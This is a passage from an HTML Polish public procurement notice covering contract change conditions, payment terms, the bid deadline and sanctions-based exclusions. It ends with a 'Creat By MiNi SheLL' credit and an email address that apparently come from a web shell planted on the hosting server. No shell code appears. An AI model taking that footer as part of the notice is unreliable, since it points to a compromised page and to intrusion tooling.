wymienionych w Ogłoszeniu o zamówieniu i treści umowy;<br/>- zaistnienia siły wyższej w rozumieniu Kodeksu Cywilnego (klęska żywiołowa, niepokoje społeczne, działania militarne itp.);<br/>- opóźnień z przyczyn leżących po stronie Zamawiającego;<br/>5) zmiany harmonogramu realizacji umowy z przyczyn projektowych; Zamawiający dopuszcza możliwość wydłużenia okresu realizacji przedmiotu zamówienia (o czym poinformuje Wykonawcę minimum 14 dni wcześniej).<br/>6) zmiany terminu i zasad płatności:<br/>- w przypadku ograniczenia finansowego po stronie Zamawiającego, z przyczyn od niego niezależnych;<br/>- zasad płatności (Zamawiający informuje, że termin płatności wynagrodzenia Wykonawcy uzależniony jest od terminu wpłynięcia na konto Zamawiającego środków przeznaczonych na pokrycie wydatków związanych realizacją projektu na etapie, w którym uczestniczył w nim Wykonawca i może ulegać opóźnieniom). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/transakcja/1154770 w myśl ustawy Pzp na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-22 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> A.<br/>Zamawiający nie przewiduje możliwości i nie wymaga złożenia oferty po odbyciu wizji lokalnej lub sprawdzeniu dokumentów.<br/>B.<br/>Z postępowania o udzielenie zamówienia na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tj. Dz.U. 2025 r. poz. 514) wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 tejże ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124, z późn. zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 tejże ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120, 295 i 1598 oraz z 2024 r. poz. 619, 1685 i 1863) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 tejże ustawy.<br/>Wykluczenie następuje na okres trwania wyżej wymienionych okoliczności. W przypadku Wykonawcy wykluczonego na podstawie przesłanek określonych w niniejszym ustępie Zamawiający odrzuci ofertę takiego Wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com